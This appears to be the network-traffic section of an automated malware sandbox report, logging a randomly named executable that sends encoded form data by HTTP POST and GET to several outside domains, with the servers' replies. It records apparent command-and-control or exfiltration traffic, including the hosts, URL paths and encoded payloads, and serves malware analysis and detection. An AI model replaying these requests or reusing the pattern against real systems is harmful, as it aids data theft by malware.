                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 37 65 4b 4e 4a 42 61 66 44 2f 78 65 61 62 72 45 48 63 41 4e 76 30 31 39 6b 39 53 54 39 76 7a 33 5a 6f 2f 68 53 63 52 43 64 73 31 33 5a 75 44 4c 45 78 53 70 64 65 77 68 65 5a 4d 4e 48 6e 42 39 76 71 6e 30 4a 65 39 42 53 53 56 54 50 50 54 2b 59 79 55 75 65 56 39 6f 56 32 58 6c 51 50 73 73 70 4f 6b 47 43 50 72 44 5a 54 56 4a 54 43 58 58 62 31 43 67 67 77 72 39 61 65 39 6e 6f 53 4a 4c 57 53 30 61 78 36 49 4b 32 77 49 45 53 4a 58 4e 41 6a 62 69 63 62 38 64 77 2f 68 44 6c 54 48 36 4d 45 54 46 42 41 2b 4f 63 52 2b 41 7a 5a 56 50 58 33 79 39 67 56 2b 58 42 76 74 36 67 4e 41 58 66 53 4e 30 2b 32 64 69 49 62 4f 4c 6b 32 59 6b
                                                  Data Ascii: prutfR_P=dNiLasFHVsc47eKNJBafD/xeabrEHcANv019k9ST9vz3Zo/hScRCds13ZuDLExSpdewheZMNHnB9vqn0Je9BSSVTPPT+YyUueV9oV2XlQPsspOkGCPrDZTVJTCXXb1Cggwr9ae9noSJLWS0ax6IK2wIESJXNAjbicb8dw/hDlTH6METFBA+OcR+AzZVPX3y9gV+XBvt6gNAXfSN0+2diIbOLk2Yk
                                                  Sep 16, 2024 09:39:15.619581938 CEST154INHTTP/1.1 403 Forbidden
                                                  Content-Type: text/plain; charset=utf-8
                                                  Date: Mon, 16 Sep 2024 07:39:15 GMT
                                                  Content-Length: 11
                                                  Connection: close
                                                  Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                  Data Ascii: Bad Request


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.549723103.42.108.46802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:39:17.311908960 CEST1837OUTPOST /yl6y/ HTTP/1.1
                                                  Host: www.independent200.org
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.independent200.org
                                                  Referer: http://www.independent200.org/yl6y/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 37 65 4b 4e 4a 42 61 66 44 2f 78 65 61 62 72 45 48 63 41 4e 76 30 31 39 6b 39 53 54 39 76 72 33 59 61 33 68 51 2f 4a 43 63 73 31 33 48 2b 44 49 45 78 53 52 64 66 59 6c 65 5a 51 37 48 68 46 39 75 49 66 30 50 71 70 42 4c 69 56 54 58 50 54 7a 48 69 55 37 65 55 4e 57 56 32 48 6c 51 50 73 73 70 49 67 47 46 62 66 44 56 7a 56 4b 45 79 58 6c 51 56 43 59 67 30 2b 4b 61 65 70 64 6f 69 70 4c 57 32 55 61 2b 70 67 4b 72 41 49 38 56 4a 58 56 41 69 6e 48 63 62 77 6e 77 2f 46 6c 6c 56 33 36 4d 43 57 66 46 69 4c 54 66 51 4b 50 33 72 51 70 58 54 37 65 67 31 36 50 63 64 74 4a 6a 50 64 36 51 55 78 73 33 57 59 75 5a 50 61 2f 74 68 35 53 45 48 4e 4a 61 4f 46 71 73 4a 57 76 56 61 61 44 2f 52 30 57 70 46 63 4e 48 54 65 63 79 69 6c 4f 30 7a 41 38 32 5a 6d 48 68 6e 62 33 49 2b 6f 57 78 66 74 4d 72 54 4f 41 7a 32 32 66 31 30 7a 45 44 70 35 43 4c 39 74 42 31 53 41 68 4e 35 52 56 36 58 53 50 38 78 71 77 42 36 45 62 63 45 6d 76 4b 6f 48 52 6b 70 46 50 79 55 4d 73 59 [TRUNCATED]
                                                  Data Ascii: prutfR_P=dNiLasFHVsc47eKNJBafD/xeabrEHcANv019k9ST9vr3Ya3hQ/JCcs13H+DIExSRdfYleZQ7HhF9uIf0PqpBLiVTXPTzHiU7eUNWV2HlQPsspIgGFbfDVzVKEyXlQVCYg0+KaepdoipLW2Ua+pgKrAI8VJXVAinHcbwnw/FllV36MCWfFiLTfQKP3rQpXT7eg16PcdtJjPd6QUxs3WYuZPa/th5SEHNJaOFqsJWvVaaD/R0WpFcNHTecyilO0zA82ZmHhnb3I+oWxftMrTOAz22f10zEDp5CL9tB1SAhN5RV6XSP8xqwB6EbcEmvKoHRkpFPyUMsY2LoCEN/gh7eG/uWHe3BvTj6donP0AeReytR6Dw70RHp37IV8cYwsVPzie2Bhf9kui22sKeZjrbXDSefreOvpUo9TUj8+HjIq7sA4eFBmrWbtwS3vSR8Vj6eOW6Tt4JoRYXMk8NqCq9Lcrs3M7vS7tNbWWrHdU2H31fNQY1607jcjEFR5PDJQQgKaAhLX7rMIfSZ+Hq7UoyWd5zOZI7R1scBj/U+/7PWCWK19Hu70UPkgT1iuhkH0qNRYhxHUQK1pm/F0N15YJMvh/CbZ5ERnMcU/jUY/xIO49sLEahWMwIpJcNpdu0+EahKfeb5oMhUZIVHHKMT5MVNwesydTYaj6JjyIsWFSTXZb9oDt/bdJVGkWHE11Fp0Ts42kT7XqNi5vO79mT65cHnjBLOYC8TVmy9NGwXN8VkGChYC2P4kPyljtxqJRejg3WYFMhKvbyaX9+HoYR/hKO18HBkXFbCce+mkBqOAew40eUzfFrwTt2PaMQyAWdlxLCvJlobxHdszcPL5IuCjSLTcNaQDitXUNUWhl3pPRQZRW5/avAjVNxKrXRlKUcajBbQZCmNSrvAhYCxXxE5XDYnskm8vnDF4fUZZIOcnuh7en+6dQSzGsSOPe7ebdk4H57iM0LItOzwypPoOPh4tjnYbOxZoD1jza0+4I2ELHDK5po [TRUNCATED]
                                                  Sep 16, 2024 09:39:18.180404902 CEST154INHTTP/1.1 403 Forbidden
                                                  Content-Type: text/plain; charset=utf-8
                                                  Date: Mon, 16 Sep 2024 07:39:18 GMT
                                                  Content-Length: 11
                                                  Connection: close
                                                  Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                  Data Ascii: Bad Request


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.549724103.42.108.46802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:39:19.856473923 CEST530OUTGET /yl6y/?u8b=M0MH_xux6&prutfR_P=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+FSdSIKD6JgMVQEI+NVmTQ69s3vAAdvPATGhITAPXZUXQ6A== HTTP/1.1
                                                  Host: www.independent200.org
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Sep 16, 2024 09:39:20.746443987 CEST154INHTTP/1.1 403 Forbidden
                                                  Content-Type: text/plain; charset=utf-8
                                                  Date: Mon, 16 Sep 2024 07:39:20 GMT
                                                  Content-Length: 11
                                                  Connection: close
                                                  Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                  Data Ascii: Bad Request


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.5497253.33.130.190802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:39:25.803492069 CEST797OUTPOST /06rp/ HTTP/1.1
                                                  Host: www.tigre777gg.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.tigre777gg.online
                                                  Referer: http://www.tigre777gg.online/06rp/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 76 35 67 56 72 6c 4e 6b 34 6b 67 42 49 39 62 79 75 53 76 46 61 46 6c 61 6c 76 6c 46 78 76 44 52 7a 54 52 5a 4b 42 69 31 69 2f 37 43 4c 6e 63 57 67 59 7a 4c 65 47 43 5a 43 7a 32 41 6d 64 6b 6a 6e 66 48 50 74 69 4e 55 55 51 31 2f 42 66 6a 6a 65 6e 4c 53 6e 66 4b 4d 55 4e 62 38 76 47 41 58 63 38 54 35 37 4a 64 36 33 54 41 44 53 31 2f 57 39 6d 56 37 6d 6d 76 64 4e 38 53 76 30 73 2b 68 75 44 66 67 44 6d 66 68 6d 6e 55 42 35 35 65 64 62 52 38 77 79 6c 35 48 59 68 76 41 34 39 54 30 58 30 35 57 63 67 4d 78 63 47 2f 43 4b 77 75 62 6b 33 4c 31 6a 66 61 63 62 45 3d
                                                  Data Ascii: prutfR_P=+gx9o4ylIYGL+v5gVrlNk4kgBI9byuSvFaFlalvlFxvDRzTRZKBi1i/7CLncWgYzLeGCZCz2AmdkjnfHPtiNUUQ1/BfjjenLSnfKMUNb8vGAXc8T57Jd63TADS1/W9mV7mmvdN8Sv0s+huDfgDmfhmnUB55edbR8wyl5HYhvA49T0X05WcgMxcG/CKwubk3L1jfacbE=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.5497263.33.130.190802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:39:28.343379021 CEST817OUTPOST /06rp/ HTTP/1.1
                                                  Host: www.tigre777gg.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.tigre777gg.online
                                                  Referer: http://www.tigre777gg.online/06rp/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 4d 68 67 5a 71 6c 4e 68 59 6b 68 64 59 39 62 38 4f 54 6d 46 61 42 6c 61 6e 44 4c 45 44 4c 44 51 52 37 52 59 4c 42 69 35 43 2f 37 61 62 6e 64 62 41 59 34 4c 65 61 67 5a 44 2f 32 41 6d 68 6b 6a 6a 58 48 50 61 32 4f 55 45 51 33 71 52 66 68 38 4f 6e 4c 53 6e 66 4b 4d 55 70 78 38 76 4f 41 58 4e 4d 54 37 5a 68 61 6b 6e 54 44 58 43 31 2f 53 39 6d 5a 37 6d 6e 34 64 50 59 38 76 77 63 2b 68 73 4c 66 68 57 4b 59 30 57 6e 61 50 5a 34 41 64 4c 35 77 34 78 42 77 44 62 30 64 42 70 35 61 38 42 5a 54 4d 2b 6f 6b 69 38 71 48 53 5a 34 5a 4b 55 57 69 76 41 50 71 43 4d 53 79 78 4a 2b 6d 36 6a 31 6b 41 4b 4f 5a 6a 55 44 70 64 66 6c 69
                                                  Data Ascii: prutfR_P=+gx9o4ylIYGL+MhgZqlNhYkhdY9b8OTmFaBlanDLEDLDQR7RYLBi5C/7abndbAY4LeagZD/2AmhkjjXHPa2OUEQ3qRfh8OnLSnfKMUpx8vOAXNMT7ZhaknTDXC1/S9mZ7mn4dPY8vwc+hsLfhWKY0WnaPZ4AdL5w4xBwDb0dBp5a8BZTM+oki8qHSZ4ZKUWivAPqCMSyxJ+m6j1kAKOZjUDpdfli


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.5497273.33.130.190802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:39:30.947163105 CEST1834OUTPOST /06rp/ HTTP/1.1
                                                  Host: www.tigre777gg.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.tigre777gg.online
                                                  Referer: http://www.tigre777gg.online/06rp/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 4d 68 67 5a 71 6c 4e 68 59 6b 68 64 59 39 62 38 4f 54 6d 46 61 42 6c 61 6e 44 4c 45 44 44 44 51 69 44 52 5a 73 39 69 34 43 2f 37 54 37 6e 59 62 41 59 6c 4c 65 53 6b 5a 44 6a 6d 41 6a 74 6b 68 45 58 48 4a 6f 4f 4f 4e 30 51 33 6f 52 66 6b 6a 65 6d 52 53 6e 50 4f 4d 55 5a 78 38 76 4f 41 58 4f 55 54 79 72 4a 61 6d 6e 54 41 44 53 31 6a 57 39 6d 39 37 6d 66 6f 64 50 63 43 73 42 67 2b 69 50 6a 66 6d 67 2b 59 32 32 6e 50 4d 5a 34 49 64 4c 6b 75 34 78 74 57 44 59 6f 33 42 75 31 61 76 67 77 76 5a 36 34 4e 33 64 4f 62 42 49 35 39 59 41 43 46 69 69 58 37 65 2f 2b 7a 34 4a 32 50 2f 58 4a 34 4d 4c 4b 56 2f 79 66 45 61 34 59 32 44 35 78 54 68 61 6b 48 73 65 2b 65 38 79 45 66 49 2f 34 67 69 59 35 45 53 59 78 73 45 71 65 6d 65 55 4e 38 78 59 37 64 47 34 43 77 70 35 56 45 72 68 39 39 52 56 39 68 4d 34 6c 43 4d 6b 59 54 6e 4d 7a 33 41 36 65 2b 42 30 39 58 51 4e 6d 47 77 68 42 64 64 75 39 45 6a 73 54 6f 67 31 71 6e 5a 67 59 2b 35 4c 52 43 31 6d 37 34 56 [TRUNCATED]
                                                  Data Ascii: prutfR_P=+gx9o4ylIYGL+MhgZqlNhYkhdY9b8OTmFaBlanDLEDDDQiDRZs9i4C/7T7nYbAYlLeSkZDjmAjtkhEXHJoOON0Q3oRfkjemRSnPOMUZx8vOAXOUTyrJamnTADS1jW9m97mfodPcCsBg+iPjfmg+Y22nPMZ4IdLku4xtWDYo3Bu1avgwvZ64N3dObBI59YACFiiX7e/+z4J2P/XJ4MLKV/yfEa4Y2D5xThakHse+e8yEfI/4giY5ESYxsEqemeUN8xY7dG4Cwp5VErh99RV9hM4lCMkYTnMz3A6e+B09XQNmGwhBddu9EjsTog1qnZgY+5LRC1m74VuzUn9ZJboLk0QWcDBjYoR2tp78ckLzt4yWVdkHxjhx4vUEFrQn72JQYGaURiwl0cngpBvqBpOG/n3v/6TV3cJ95iKcdMMdN+rYIXHryxipHgsot8jQOTSHj2jCbtvpbMH1W8kT+7SxMLZjutfgWMjbly3pprQjMdO7QMq4VXx05baHDEfYehZVXBQ7GwTgPXU6q+9jdyJiZQPRqvC0rtrl/Ab/wlch3P9OzFtmZdVDGcaPK97NDBCU/T5Lh63QC5dZ73v4hMYpG0BBoko8b3BsQY4h6eXCCbxMwoyZXzvUsXPdRR9hAuS//Uv6/QBCloeEXdXXt4G7wva5qhmVQUD311PA9oBRIxqRDT9L8lUTGIiBzeaJtgbfI+6iIhnyZ5hMGeFv/J4Dd2459p41cfYib6BAwNon0my1esRQ1Z5+Xrq29DvuyNEzsieoRlobTBuLGYBxLuoE8/EMl6eaoEtVugBvyoIFFMJsdNrOC7We61jhJokS2RyNrSwJwJRgBH/2ZMJZwy5yHqjGbtSsRD8Pi84lhjL1NsWfbCcXlHOJIcd7QQtsRUmje9A6g0yu4lqc9/1g8S4G6JxZlnf2hxbCq13AChLfrT17NgJYpMxBXAy2BkUJc2qRXHZ2YgiKYC2E13Yfa7dhmMT4bbWgOdCK2HUhhQ75enko [TRUNCATED]


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  16192.168.2.5497283.33.130.190802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:39:33.559560061 CEST529OUTGET /06rp/?prutfR_P=ziZdrN3wZJ2qpMxPB7kqr9VBePBO99X6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYa0I3+Rjxysn3aWSNR3EoirWNXIk0ludq4g7uCmltVJnspg==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.tigre777gg.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Sep 16, 2024 09:39:36.928082943 CEST410INHTTP/1.1 200 OK
                                                  Server: openresty
                                                  Date: Mon, 16 Sep 2024 07:39:36 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 270
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 72 75 74 66 52 5f 50 3d 7a 69 5a 64 72 4e 33 77 5a 4a 32 71 70 4d 78 50 42 37 6b 71 72 39 56 42 65 50 42 4f 39 39 58 36 41 65 5a 59 41 6e 66 6e 43 44 54 51 64 6a 6a 52 59 37 34 49 73 53 65 70 44 49 62 50 5a 78 30 74 43 75 66 70 53 52 72 33 43 41 78 57 30 79 58 6e 4b 6f 53 59 61 30 49 33 2b 52 6a 78 79 73 6e 33 61 57 53 4e 52 33 45 6f 69 72 57 4e 58 49 6b 30 6c 75 64 71 34 67 37 75 43 6d 6c 74 56 4a 6e 73 70 67 3d 3d 26 75 38 62 3d 4d 30 4d 48 5f 78 75 78 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?prutfR_P=ziZdrN3wZJ2qpMxPB7kqr9VBePBO99X6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYa0I3+Rjxysn3aWSNR3EoirWNXIk0ludq4g7uCmltVJnspg==&u8b=M0MH_xux6"}</script></head></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  17192.168.2.549729199.59.243.226802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:39:50.206973076 CEST812OUTPOST /wwak/ HTTP/1.1
                                                  Host: www.personal-loans-jp8.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.personal-loans-jp8.xyz
                                                  Referer: http://www.personal-loans-jp8.xyz/wwak/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 4a 31 37 6d 71 31 56 73 79 41 52 4f 4e 66 61 44 42 62 37 4e 76 69 4b 7a 35 2f 4a 48 56 4e 46 51 69 62 76 6d 50 67 6e 57 32 44 74 4f 70 42 56 4d 4d 6c 6b 4e 6e 63 77 38 56 4f 31 79 33 63 42 4a 36 72 71 54 68 44 77 4f 30 50 4a 75 38 61 7a 65 46 41 46 31 52 6e 39 4b 4b 6e 42 41 53 33 31 49 71 51 4f 57 4f 5a 45 77 38 68 2b 30 73 39 37 43 56 59 62 59 48 42 33 4c 69 75 72 7a 36 43 47 36 72 65 6f 53 58 45 55 54 38 68 6f 2f 41 6c 41 4d 30 70 65 66 52 55 46 63 65 64 4b 51 71 48 73 6f 67 53 61 4f 68 34 6a 41 74 6e 6c 37 50 7a 47 6c 56 33 43 49 45 46 6b 49 4c 4c 45 67 34 50 63 33 64 65 75 36 6a 6c 6f 3d
                                                  Data Ascii: prutfR_P=J17mq1VsyARONfaDBb7NviKz5/JHVNFQibvmPgnW2DtOpBVMMlkNncw8VO1y3cBJ6rqThDwO0PJu8azeFAF1Rn9KKnBAS31IqQOWOZEw8h+0s97CVYbYHB3Liurz6CG6reoSXEUT8ho/AlAM0pefRUFcedKQqHsogSaOh4jAtnl7PzGlV3CIEFkILLEg4Pc3deu6jlo=
                                                  Sep 16, 2024 09:39:50.728400946 CEST1236INHTTP/1.1 200 OK
                                                  date: Mon, 16 Sep 2024 07:39:50 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 1154
                                                  x-request-id: b5c4d1a1-27bb-4ecb-9125-22208a0a3703
                                                  cache-control: no-store, max-age=0
                                                  accept-ch: sec-ch-prefers-color-scheme
                                                  critical-ch: sec-ch-prefers-color-scheme
                                                  vary: sec-ch-prefers-color-scheme
                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==
                                                  set-cookie: parking_session=b5c4d1a1-27bb-4ecb-9125-22208a0a3703; expires=Mon, 16 Sep 2024 07:54:50 GMT; path=/
                                                  connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 39 43 49 45 47 6c 38 49 51 43 33 73 5a 5a 74 4a 66 55 78 6e 54 45 45 6a 38 30 4d 39 2f 45 2f 6a 5a 75 64 7a 56 70 6d 77 4b 55 34 72 37 30 6f 73 65 6c 74 73 44 74 32 6a 55 32 6f 4a 50 76 6c 77 54 39 67 30 71 56 32 49 73 38 4a 38 42 67 66 70 62 76 79 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                  Sep 16, 2024 09:39:50.728446960 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjVjNGQxYTEtMjdiYi00ZWNiLTkxMjUtMjIyMDhhMGEzNzAzIiwicGFnZV90aW1lIjoxNzI2NDcyMz


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  18192.168.2.549730199.59.243.226802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:39:52.752088070 CEST832OUTPOST /wwak/ HTTP/1.1
                                                  Host: www.personal-loans-jp8.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.personal-loans-jp8.xyz
                                                  Referer: http://www.personal-loans-jp8.xyz/wwak/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 4a 31 37 6d 71 31 56 73 79 41 52 4f 4e 2f 71 44 44 34 54 4e 70 43 4b 30 6b 50 4a 48 43 64 46 55 69 62 54 6d 50 68 53 54 33 78 35 4f 6f 6b 70 4d 65 52 49 4e 67 63 77 38 65 75 30 34 34 38 42 43 36 72 58 6d 68 42 30 4f 30 4f 70 75 38 62 44 65 46 33 78 32 51 33 39 55 48 48 41 47 57 33 31 49 71 51 4f 57 4f 64 70 72 38 6c 53 30 73 4e 4c 43 55 35 62 58 4a 68 33 49 6c 75 72 7a 2b 43 47 45 72 65 6f 38 58 41 30 39 38 69 51 2f 41 67 38 4d 30 59 65 63 59 55 46 67 61 64 4c 56 76 6b 56 42 68 53 65 35 70 65 32 66 39 6c 31 46 4b 46 72 50 50 56 4b 67 58 6c 49 77 62 59 4d 58 70 2f 39 65 48 39 2b 4b 39 79 39 62 6f 6d 38 30 58 6d 51 51 74 57 65 50 52 51 35 2f 66 68 79 57
